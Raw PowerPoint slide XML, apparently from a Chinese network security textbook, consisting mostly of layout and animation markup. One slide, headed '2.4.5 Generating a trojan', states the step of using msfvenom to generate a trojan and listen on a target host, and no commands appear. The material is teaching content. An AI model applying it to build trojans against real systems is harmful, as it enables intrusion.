              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用msfvenom模块生成木马并对目标主机进行监听。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
